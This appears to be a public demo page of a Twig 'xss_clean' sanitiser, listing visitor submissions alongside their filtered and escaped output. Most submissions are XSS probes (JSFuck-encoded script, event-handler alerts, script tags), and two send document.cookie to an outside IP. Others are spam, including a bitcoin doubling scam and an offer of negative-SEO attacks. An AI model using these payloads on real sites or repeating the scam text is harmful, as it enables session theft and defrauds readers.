[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[!+[]+!+[]])+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]])()((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[+!+[]+[!+[]+!+[]+!+[]]]+[+!+[]]+([+[]]+![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[!+[]+!+[]+[+[]]])

result with twig: {{ xss.xss | escape }}:

[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(+(!+[]+!+[]+!+[]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[!+[]+!+[]])+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]])()((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[+!+[]+[!+[]+!+[]+!+[]]]+[+!+[]]+([+[]]+![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[!+[]+!+[]+[+[]]])

keyword(s): jsfuck

description: http://www.jsfuck.com/

by teste | at 2022-05-30 15:45:12


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

dfgdfg

result with twig: {{ xss.xss | escape }}:

dfgdfg

keyword(s):

description:

by fgfgd | at 2022-05-26 11:16:33


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

?'='MzMF(9613)'bad='

result with twig: {{ xss.xss | escape }}:

?%27onmouseover%3D%27MzMF%289613%29%27bad%3D%27

keyword(s): a

description: a

by a | at 2022-05-25 04:52:40


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

?'='MzMF(9613)'bad='

result with twig: {{ xss.xss | escape }}:

?%27onmouseover%3D%27MzMF%289613%29%27bad%3D%27

keyword(s): ff

description: fff

by fff | at 2022-05-25 04:48:24


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

?\\\'=\\\'MzMF(9613)\\\'bad=\\

result with twig: {{ xss.xss | escape }}:

?\\\'=\\\'MzMF(9613)\\\'bad=\\

keyword(s): ddd

description: dd

by ddd | at 2022-05-25 04:47:51


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Hi there,\\r\\n\\r\\nHave you ever wondered why new tokens listed on Uniswap, Pancakeswap or any decentralized exchange are always subject to insane price volatility?\\r\\n\\r\\nDid you know that front running bots have been dominating the market and profiting due to that?\\r\\n\\r\\nCheck out our new Youtube video for a free and detailed tutorial on how to deploy your own front running bot:\\r\\nhttps://youtu.be/SQHFveYdjV8\\r\\n\\r\\nKind Regards,\\r\\nKari

result with twig: {{ xss.xss | escape }}:

Hi there,\\r\\n\\r\\nHave you ever wondered why new tokens listed on Uniswap, Pancakeswap or any decentralized exchange are always subject to insane price volatility?\\r\\n\\r\\nDid you know that front running bots have been dominating the market and profiting due to that?\\r\\n\\r\\nCheck out our new Youtube video for a free and detailed tutorial on how to deploy your own front running bot:\\r\\nhttps://youtu.be/SQHFveYdjV8\\r\\n\\r\\nKind Regards,\\r\\nKari

keyword(s):

description: Hi there,\\r\\n\\r\\nHave you ever wondered why new tokens listed on Uniswap, Pancakeswap or any decentralized exchange are always subject to insane price volatility?\\r\\n\\r\\nDid you know that front running bots have been dominating the market and profiting due to that?\\r\\n\\r\\nCheck out our new Youtube video for a free and detailed tutorial on how to deploy your own front running bot:\\r\\nhttps://youtu.be/SQHFveYdjV8\\r\\n\\r\\nKind Regards,\\r\\nKari

by Kari Farrington | at 2022-05-24 08:10:21


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

aka. &io

result with twig: {{ xss.xss | escape }}:

aka. &io<amp>

keyword(s): aka. &io<amp>

description: aka. &io<amp>

by Iohan | at 2022-05-23 15:20:28


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Hi there\\r\\nDo you want to get backlinks from domains that have tons of ranking keywords?\\r\\n\\r\\nhttps://www.monkeydigital.co/semrush-backlinks/

result with twig: {{ xss.xss | escape }}:

Hi there\\r\\nDo you want to get backlinks from domains that have tons of ranking keywords?\\r\\n\\r\\nhttps://www.monkeydigital.co/semrush-backlinks/

keyword(s):

description: Hi there\\r\\nDo you want to get backlinks from domains that have tons of ranking keywords?\\r\\n\\r\\nhttps://www.monkeydigital.co/semrush-backlinks/

by Evie Blackwelder | at 2022-05-20 13:08:27


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Your go-to source for leads. We can provide business to business and business to consumer leads, custom-tailored to your needs.\\r\\n\\r\\nCustomDatabases.org

result with twig: {{ xss.xss | escape }}:

Your go-to source for leads. We can provide business to business and business to consumer leads, custom-tailored to your needs.\\r\\n\\r\\nCustomDatabases.org

keyword(s):

description: Your go-to source for leads. We can provide business to business and business to consumer leads, custom-tailored to your needs.\\r\\n\\r\\nCustomDatabases.org

by Alan Legere | at 2022-05-19 20:24:59


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

\\\"%27>

result with twig: {{ xss.xss | escape }}:

\\\"%27><qss%20a%3DX161697016Y1_1Z>

keyword(s): b

description: c

by a | at 2022-05-18 10:41:23


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

1

result with twig: {{ xss.xss | escape }}:

1

keyword(s): 1

description:

by 1 | at 2022-05-18 08:22:06


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

1\\\"=\\\"alert()\\\"\\\"

result with twig: {{ xss.xss | escape }}:

1\\\"onmouseover=\\\"alert(document.cookie)\\\"\\\"

keyword(s): 1\\\"=\\\"alert()\\\"\\\"

description: 1\\\"=\\\"alert()\\\"\\\"

by 1\\\"=\\\"alert()\\\"\\\" | at 2022-05-17 16:53:15


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script>123</script>

keyword(s): 123

description: 123

by 123 | at 2022-05-16 08:53:12


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<img onerror=alert(1)>

keyword(s): aa

description: aaa

by aa | at 2022-05-15 17:28:46


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

xxx

result with twig: {{ xss.xss | escape }}:

xxx

keyword(s): aa

description: aaa

by aa | at 2022-05-15 17:28:29


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

test\\r\\n
\\r\\ntest

result with twig: {{ xss.xss | escape }}:

test\\r\\n<br>\\r\\ntest

keyword(s): dasdasd

description: asasdasd

by adas | at 2022-05-14 16:27:48


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

alert(1);

result with twig: {{ xss.xss | escape }}:

alert(1);

keyword(s): asd

description: aaaa

by asd | at 2022-05-11 18:18:15


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

TESTGD

result with twig: {{ xss.xss | escape }}:

<p>TESTGD</p><image src =q onerror=prompt(8)>

keyword(s):

description:

by test | at 2022-05-11 14:46:05


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

TESTGD

result with twig: {{ xss.xss | escape }}:

<p>TESTGD</p><image src =q onerror=prompt(8)>

keyword(s): adssaddsa

description: asdasdas asdasd

by dasdasdas | at 2022-05-11 11:32:35


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

TESTGD

result with twig: {{ xss.xss | escape }}:

<p>TESTGD</p><image src =q onerror=prompt(8)>

keyword(s): f

description: f

by f | at 2022-05-11 10:40:09


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

%253Cscript%253Ealert(\\\'XSS\\\')%253C%252Fscript%253E

keyword(s): asdf

description: asdf

by asd | at 2022-05-11 10:38:16


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<IMG SRC=x onpopstate=\\\"alert(String.fromCharCode(88,83,83))\\\">

keyword(s): asdf

description: asdf

by asdf | at 2022-05-11 10:37:38


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

80% world population

result with twig: {{ xss.xss | escape }}:

80% world population

keyword(s): kanton

description: anton

by aton | at 2022-05-11 10:36:31


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

var user_name=location.href.indexOf(“user=”);

result with twig: {{ xss.xss | escape }}:

var user_name=location.href.indexOf(“user=”);

keyword(s):

description:

by J1 | at 2022-05-11 03:23:24


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

asdfasdf

result with twig: {{ xss.xss | escape }}:

asdfasdf

keyword(s):

description:

by <b>asdfasdf</b> | at 2022-05-10 09:17:42


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

asdf

result with twig: {{ xss.xss | escape }}:

asdf

keyword(s): fasfd

description: adf

by rfwasdf | at 2022-05-09 21:07:02


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

FFFFFFFFFFFFFFFFFFFFF

result with twig: {{ xss.xss | escape }}:

FFFFFFFFFFFFFFFFFFFFF

keyword(s): Possimus quae lauda

description: Praesentium ut volup

by Voluptatibus possimu | at 2022-05-09 19:23:57


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Exercitation consect

result with twig: {{ xss.xss | escape }}:

Exercitation consect

keyword(s): Sit qui id sit eni

description: Et aut libero lorem

by Id consectetur ipsa | at 2022-05-09 19:22:50


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

олд

result with twig: {{ xss.xss | escape }}:

олд

keyword(s):

description: бьбт

by олдол | at 2022-05-09 15:27:54


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

s366NBJ7pQA

result with twig: {{ xss.xss | escape }}:

s366NBJ7pQA

keyword(s):

description:

by \\\\\\\\\\\\\\\" | at 2022-05-08 18:01:03


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

\\\"

result with twig: {{ xss.xss | escape }}:

\\\"

keyword(s):

description:

by Mo\\\'\\\'\\\'<\\\"> | at 2022-05-05 07:34:58


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Hello, from CustomData.click we are a provider of unique databases that could help your business.\\r\\n\\r\\nPlease visit us at CustomData.click to see if we can help you.\\r\\n\\r\\nRegards,\\r\\nLola

result with twig: {{ xss.xss | escape }}:

Hello, from CustomData.click we are a provider of unique databases that could help your business.\\r\\n\\r\\nPlease visit us at CustomData.click to see if we can help you.\\r\\n\\r\\nRegards,\\r\\nLola

keyword(s):

description: Hello, from CustomData.click we are a provider of unique databases that could help your business.\\r\\n\\r\\nPlease visit us at CustomData.click to see if we can help you.\\r\\n\\r\\nRegards,\\r\\nLola

by Lola Cordner | at 2022-05-05 05:18:06


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

{% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

{% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

keyword(s):

description:

by D | at 2022-05-02 08:48:55


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Hi there,\\r\\n\\r\\nHave you ever wondered why new tokens listed on Uniswap, Pancakeswap or any decentralized exchange are always subject to insane price volatility?\\r\\n\\r\\nDid you know that front running bots have been dominating the market and profiting due to that?\\r\\n\\r\\nCheck out our new Youtube video for a free and detailed tutorial on how to deploy your own front running bot:\\r\\nhttps://youtu.be/SQHFveYdjV8\\r\\n\\r\\nKind Regards,\\r\\nCheryle

result with twig: {{ xss.xss | escape }}:

Hi there,\\r\\n\\r\\nHave you ever wondered why new tokens listed on Uniswap, Pancakeswap or any decentralized exchange are always subject to insane price volatility?\\r\\n\\r\\nDid you know that front running bots have been dominating the market and profiting due to that?\\r\\n\\r\\nCheck out our new Youtube video for a free and detailed tutorial on how to deploy your own front running bot:\\r\\nhttps://youtu.be/SQHFveYdjV8\\r\\n\\r\\nKind Regards,\\r\\nCheryle

keyword(s):

description: Hi there,\\r\\n\\r\\nHave you ever wondered why new tokens listed on Uniswap, Pancakeswap or any decentralized exchange are always subject to insane price volatility?\\r\\n\\r\\nDid you know that front running bots have been dominating the market and profiting due to that?\\r\\n\\r\\nCheck out our new Youtube video for a free and detailed tutorial on how to deploy your own front running bot:\\r\\nhttps://youtu.be/SQHFveYdjV8\\r\\n\\r\\nKind Regards,\\r\\nCheryle

by Cheryle Atchley | at 2022-05-02 03:50:05


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<b onmouseover=alert(‘XSS testing!‘)></b>

keyword(s):

description:

by tester | at 2022-05-02 01:07:29


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script>alert(\\\'test\\\')</script>

keyword(s): asdasdasd

description: asdasdasd

by asd | at 2022-05-02 01:01:33


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

.xss { width: 100%; }

result with twig: {{ xss.xss | escape }}:

<script>alert(\\\'ok\\\');<style>.xss { width: 100%; }

keyword(s):

description:

by .xss { width: 100%; } | at 2022-04-27 16:21:11


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

<style>.xss { width: 100%; }

result with twig: {{ xss.xss | escape }}:

<style>.xss { width: 100%; }

keyword(s):

description:

by <style>.xss { width: 100%; } | at 2022-04-27 16:20:27


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

You have been chosen to participate in one of the biggest bitcoin giveaways. I have accumulated roughly around $100,000,000 in profits from multiple tech startups over the past decade. Due to my success in the tech industry, I decided to put 10% of my assets in bitcoin as I believe it is the future. You can see it here https://i.postimg.cc/qvFXT8wv/giveaway.jpg Out of good faith I’m giving away $1,000,000 of that to select individuals for a short period of time. Any amount sent to my BTC address 3KNbgq8zTUfXrsN1DyhZk9cXwU1See5ckm I will send back twice the amount. The minimum amount is $5,000 and the maximum amount is $500,000. 3qy23ZBs

result with twig: {{ xss.xss | escape }}:

You have been chosen to participate in one of the biggest bitcoin giveaways. I have accumulated roughly around $100,000,000 in profits from multiple tech startups over the past decade. Due to my success in the tech industry, I decided to put 10% of my assets in bitcoin as I believe it is the future. You can see it here https://i.postimg.cc/qvFXT8wv/giveaway.jpg Out of good faith I’m giving away $1,000,000 of that to select individuals for a short period of time. Any amount sent to my BTC address 3KNbgq8zTUfXrsN1DyhZk9cXwU1See5ckm I will send back twice the amount. The minimum amount is $5,000 and the maximum amount is $500,000. 3qy23ZBs

keyword(s):

description: You have been chosen to participate in one of the biggest bitcoin giveaways. I have accumulated roughly around $100,000,000 in profits from multiple tech startups over the past decade. Due to my success in the tech industry, I decided to put 10% of my assets in bitcoin as I believe it is the future. You can see it here https://i.postimg.cc/qvFXT8wv/giveaway.jpg Out of good faith I’m giving away $1,000,000 of that to select individuals for a short period of time. Any amount sent to my BTC address 3KNbgq8zTUfXrsN1DyhZk9cXwU1See5ckm I will send back twice the amount. The minimum amount is $5,000 and the maximum amount is $500,000. 3qy23ZBs

by BTC Giveaway | at 2022-04-26 00:23:13


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

С радостью приветствуем вас! \\r\\nПредлагаем самые лучшие \\\"смертельные\\\" прогоны для веб-сайтов ваших конкурентов. Стоимость: от 2000 рублей. \\r\\n- 100% эффект. Сайты ваших конкурентов \\\"упадут\\\". \\r\\n- Наибольшее количество отрицательных фитбеков. \\r\\n- Собрана специфическая база - выжимка самых \\\"убийственных\\\" площадок из 10 000 000 веб-сайтов (вирусных, спамных, порно и тому подобных). Это действует безотказно. \\r\\n- Прогон выполняется одновременно с 4-х мощных серверов. \\r\\n- Постоянный спам активационных ссылок на официальный e-mail. \\r\\n- Выполнение заказа в течение 40-240 часов. Растянем по времени как угодно. \\r\\n- Прогоняем с запрещёнными ключевыми словами. \\r\\nTelgrm: @exrumer \\r\\nSkype: xrumer.pro \\r\\nWhatsApp: +7(977)536-08-36 \\r\\nicq: 5688885 \\r\\nТолько Эти!

result with twig: {{ xss.xss | escape }}:

С радостью приветствуем вас! \\r\\nПредлагаем самые лучшие \\\"смертельные\\\" прогоны для веб-сайтов ваших конкурентов. Стоимость: от 2000 рублей. \\r\\n- 100% эффект. Сайты ваших конкурентов \\\"упадут\\\". \\r\\n- Наибольшее количество отрицательных фитбеков. \\r\\n- Собрана специфическая база - выжимка самых \\\"убийственных\\\" площадок из 10 000 000 веб-сайтов (вирусных, спамных, порно и тому подобных). Это действует безотказно. \\r\\n- Прогон выполняется одновременно с 4-х мощных серверов. \\r\\n- Постоянный спам активационных ссылок на официальный e-mail. \\r\\n- Выполнение заказа в течение 40-240 часов. Растянем по времени как угодно. \\r\\n- Прогоняем с запрещёнными ключевыми словами. \\r\\nTelgrm: @exrumer \\r\\nSkype: xrumer.pro \\r\\nWhatsApp: +7(977)536-08-36 \\r\\nicq: 5688885 \\r\\nТолько Эти!

keyword(s):

description: С радостью приветствуем вас! \\r\\nГотовы предложить самые лучшие \\\"смертоносные\\\" прогоны для веб-сайтов ваших конкурентов. Всего от 2000 руб. \\r\\n- Гарантированный результат. Сайты точно \\\"упадут\\\". \\r\\n- Предельно возможное число негативных фитбеков. \\r\\n- Наша специфическая база - выжимка самых сильных площадок из 10 000 000 ресурсов (вирусы, спам, порно и так далее). Работает бесперебойно. \\r\\n- Прогон производим сразу с 4-х серверов. \\r\\n- Непрекращающаяся отправка токсичных ссылок на e-mail. \\r\\n- Выполнение заказа в течение 40-240 часов. Растянем по времени как угодно. \\r\\n- Прогоняем с запретными ключевыми словами. \\r\\nTelgrm: @exrumer \\r\\nSkype: xrumer.pro \\r\\nWhatsApp: +7(977)536-08-36 \\r\\nicq: 5688885 \\r\\nТолько Эти!

by Shenna Curr | at 2022-04-24 23:38:02


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<table background=\\\"javascript:alert(\\\'hi\\\');\\\"></table>

keyword(s): test

description: test

by test | at 2022-04-22 20:02:07


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script></script>

keyword(s): you

description: script tag

by me | at 2022-04-21 12:41:39


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Hello.\\r\\n\\r\\nIt is with sad regret to inform you TopDataList.com is shutting down.\\r\\n\\r\\nWe have made all our databases available for you for a once off fee.\\r\\n\\r\\nVisit us on TopDataList.com

result with twig: {{ xss.xss | escape }}:

Hello.\\r\\n\\r\\nIt is with sad regret to inform you TopDataList.com is shutting down.\\r\\n\\r\\nWe have made all our databases available for you for a once off fee.\\r\\n\\r\\nVisit us on TopDataList.com

keyword(s):

description: Hello.\\r\\n\\r\\nIt is with sad regret to inform you TopDataList.com is shutting down.\\r\\n\\r\\nWe have made all our databases available for you for a once off fee.\\r\\n\\r\\nVisit us on TopDataList.com

by Elizabet Xiong | at 2022-04-20 13:41:58


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

test

result with twig: {{ xss.xss | escape }}:

test

keyword(s): test

description: test

by test | at 2022-04-19 08:15:35


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

dastand

result with twig: {{ xss.xss | escape }}:

dastand

keyword(s): asd

description: asdasd

by asd | at 2022-04-16 17:36:50


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

ZippyLeads.org is running an easter special till the 18th of April.\\r\\n\\r\\nGet all the leads you need for your company with our easter special.

result with twig: {{ xss.xss | escape }}:

ZippyLeads.org is running an easter special till the 18th of April.\\r\\n\\r\\nGet all the leads you need for your company with our easter special.

keyword(s):

description: ZippyLeads.org is running an easter special till the 18th of April.\\r\\n\\r\\nGet all the leads you need for your company with our easter special.

by Boris Conrad | at 2022-04-14 21:21:51


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

dsdd

result with twig: {{ xss.xss | escape }}:

dsdd

keyword(s): dds

description: dsdds

by ddf | at 2022-04-14 16:35:40


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Hello.\\r\\n\\r\\nMy name is Johan Fourie and I am looking to sell DataList.biz.\\r\\n\\r\\nWe are a data company that has been in the industry for 12 years. \\r\\n\\r\\nWe do around $170k/year in revenue.\\r\\n\\r\\n1) I am looking to sell 50% of the business for $5k.\\r\\n2) It would be helpful if you are knowledgeable about the Data Business.\\r\\n3) I am looking for someone that is willing to take over administration, support, client relations.\\r\\n4) I will continue to do the marketing for new products.\\r\\n5) You will accept all future income and pay me from it.\\r\\n\\r\\nPlease contact me on WhatsApp +27 72 280 1952 or my personal email: johanfourieinc@gmail.com if you are interested in this and we can have a call.\\r\\n\\r\\nRegards,\\r\\nJohan Fourie

result with twig: {{ xss.xss | escape }}:

Hello.\\r\\n\\r\\nMy name is Johan Fourie and I am looking to sell DataList.biz.\\r\\n\\r\\nWe are a data company that has been in the industry for 12 years. \\r\\n\\r\\nWe do around $170k/year in revenue.\\r\\n\\r\\n1) I am looking to sell 50% of the business for $5k.\\r\\n2) It would be helpful if you are knowledgeable about the Data Business.\\r\\n3) I am looking for someone that is willing to take over administration, support, client relations.\\r\\n4) I will continue to do the marketing for new products.\\r\\n5) You will accept all future income and pay me from it.\\r\\n\\r\\nPlease contact me on WhatsApp +27 72 280 1952 or my personal email: johanfourieinc@gmail.com if you are interested in this and we can have a call.\\r\\n\\r\\nRegards,\\r\\nJohan Fourie

keyword(s):

description: Hello.\\r\\n\\r\\nMy name is Johan Fourie and I am looking to sell DataList.biz.\\r\\n\\r\\nWe are a data company that has been in the industry for 12 years. \\r\\n\\r\\nWe do around $170k/year in revenue.\\r\\n\\r\\n1) I am looking to sell 50% of the business for $5k.\\r\\n2) It would be helpful if you are knowledgeable about the Data Business.\\r\\n3) I am looking for someone that is willing to take over administration, support, client relations.\\r\\n4) I will continue to do the marketing for new products.\\r\\n5) You will accept all future income and pay me from it.\\r\\n\\r\\nPlease contact me on WhatsApp +27 72 280 1952 or my personal email: johanfourieinc@gmail.com if you are interested in this and we can have a call.\\r\\n\\r\\nRegards,\\r\\nJohan Fourie

by Johan Fourie | at 2022-04-14 01:19:28


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

\\\" >

result with twig: {{ xss.xss | escape }}:

\\\" ><qssp7dLADAT>

keyword(s): \\\" ><qssp7dLADAT>

description: \\\" ><qssp7dLADAT>

by \\\" ><qssp7dLADAT> | at 2022-04-13 16:13:07


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Hello\\r\\n\\r\\nIf you ever need Negative SEO or a de-rank strategy, you can hire us here\\r\\n\\r\\nhttps://www.speed-seo.net/product/negative-seo-service/\\r\\n\\r\\n

result with twig: {{ xss.xss | escape }}:

Hello\\r\\n\\r\\nIf you ever need Negative SEO or a de-rank strategy, you can hire us here\\r\\n\\r\\nhttps://www.speed-seo.net/product/negative-seo-service/\\r\\n\\r\\n

keyword(s):

description: Hello\\r\\n\\r\\nIf you ever need Negative SEO or a de-rank strategy, you can hire us here\\r\\n\\r\\nhttps://www.speed-seo.net/product/negative-seo-service/\\r\\n\\r\\n

by Kirk Ingram | at 2022-04-11 23:51:01


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<img src=\\\"void()\\\"/>

keyword(s): me

description: test

by me | at 2022-04-05 17:22:04


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script>new Image().src=\\\"https://192.165.159.122/fakepg.php?output=\\\"+document.cookie;</script>

keyword(s): hacking

description:

by hacker | at 2022-03-31 19:21:51


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script>new Image().src=\\\"https://192.165.159.122/fakepg.php?output=\\\"+document.cookie;</script>

keyword(s): hacking

description: I\\\'ll hack you!

by Hacker | at 2022-03-31 19:20:36


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Hi there,\\r\\n\\r\\nHave you ever wondered why new tokens listed on Uniswap, Pancakeswap or any decentralized exchange are always subject to insane price volatility?\\r\\n\\r\\nDid you know that front running bots have been dominating the market and profiting due to that?\\r\\n\\r\\nCheck out our new Youtube video for a free and detailed tutorial on how to deploy your own front running bot:\\r\\nhttps://www.youtube.com/watch?v=NYCG0JEEhvQ\\r\\n\\r\\nKind Regards,\\r\\nJaclyn

result with twig: {{ xss.xss | escape }}:

Hi there,\\r\\n\\r\\nHave you ever wondered why new tokens listed on Uniswap, Pancakeswap or any decentralized exchange are always subject to insane price volatility?\\r\\n\\r\\nDid you know that front running bots have been dominating the market and profiting due to that?\\r\\n\\r\\nCheck out our new Youtube video for a free and detailed tutorial on how to deploy your own front running bot:\\r\\nhttps://www.youtube.com/watch?v=NYCG0JEEhvQ\\r\\n\\r\\nKind Regards,\\r\\nJaclyn

keyword(s):

